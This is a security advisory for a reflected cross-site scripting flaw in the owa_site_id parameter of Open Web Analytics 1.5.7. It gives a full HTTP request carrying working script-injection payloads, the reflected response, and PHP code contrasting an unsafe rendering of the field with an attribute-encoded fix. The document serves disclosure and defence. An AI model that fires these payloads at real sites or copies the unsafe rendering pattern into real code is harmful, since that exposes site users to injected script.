Open Web Analytics 1.5.7 Cross Site Scripting

2016-02-25 / 2016-02-26
Credit: 1N
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Exploit Title: Open Web Analytics v1.5.7 Cross-Site Scripting
Author: 1N3 @CrowdShield https://crowdshield.com
Vendor: http://www.openwebanalytics.com/
Date: 02/24/2016

Description:

Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by pressing ALT+SHIFT+X after the payload is injected.

Request:

POST /install.php?owa_site_id=1"/accesskey="X"/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry& HTTP/1.1
Host: web.kiwi.ki
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://web.kiwi.ki/install.php?owa_site_id=&owa_do=base.installDefaultsEntry&
Cookie: owa_v=cdh%3D%3Ea2fc6dac%7C%7C%7Cvid%3D%3E1456351264222521405%7C%7C%7Cfsts%3D%3E1456351264%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E1; owa_s=cdh%3D%3Ea2fc6dac%7C%7C%7Clast_req%3D%3E1456351264%7C%7C%7Csid%3D%3E1456351264683274933%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 295

owa_protocol=http%3A%2F%2F&owa_domain=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_email_address=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_password=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_nonce=4076e70a50&owa_action=base.installBase&owa_save_button=Continue...

Response:

<input size="70" name="owa_go" value="https://web.kiwi.ki/install.php?owa_site_id=1" accesskey="X" onclick="alert(1)" type="hidden"><!--%20&owa_do=base.installDefaultsEntry&">
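
Mitigation sketch: the response above shows the request URL landing unencoded inside the value attribute of the hidden owa_go field. The PHP below is an added example, not Open Web Analytics source code; the function names, the alphanumeric site-id rule and the regression check are assumptions made for illustration. It renders the same field with and without attribute-context encoding, using the query string from the advisory's request as constructed input.

```php
<?php
// Added illustration; function names are hypothetical, not OWA source code.

// Vulnerable pattern: the current URL is concatenated into the attribute as-is,
// so a double quote in owa_site_id ends the value and starts new attributes.
function render_go_field_unsafe(string $url): string
{
    return '<input type="hidden" name="owa_go" value="' . $url . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function render_go_field_safe(string $url): string
{
    $encoded = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="owa_go" value="' . $encoded . '">';
}

// Second layer (assumption: site ids are short alphanumeric tokens).
function is_valid_site_id(string $id): bool
{
    return preg_match('/\A[A-Za-z0-9]{1,64}\z/', $id) === 1;
}

// Regression check: the output must be exactly one <input> tag whose value
// holds no raw double quote or angle bracket.
function go_field_is_intact(string $html): bool
{
    $pattern = '/\A<input type="hidden" name="owa_go" value="[^"<>]*">\z/';
    return preg_match($pattern, $html) === 1;
}

// Constructed input: the query string from the advisory's request line,
// with %20 decoded to a space.
$siteId = '1"/accesskey="X"/onclick="alert(1)"><!-- ';
$url = 'https://web.kiwi.ki/install.php?owa_site_id=' . $siteId
     . '&owa_do=base.installDefaultsEntry&';

$rendered = [
    'unsafe' => render_go_field_unsafe($url),
    'safe'   => render_go_field_safe($url),
];
foreach ($rendered as $label => $html) {
    printf("%-6s intact=%s\n  %s\n", $label, var_export(go_field_is_intact($html), true), $html);
}
printf("site id accepted by validator: %s\n", var_export(is_valid_site_id($siteId), true));
```

Encoding at output time is the primary control; the site-id validator is defence in depth and would reject this request before any rendering takes place.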

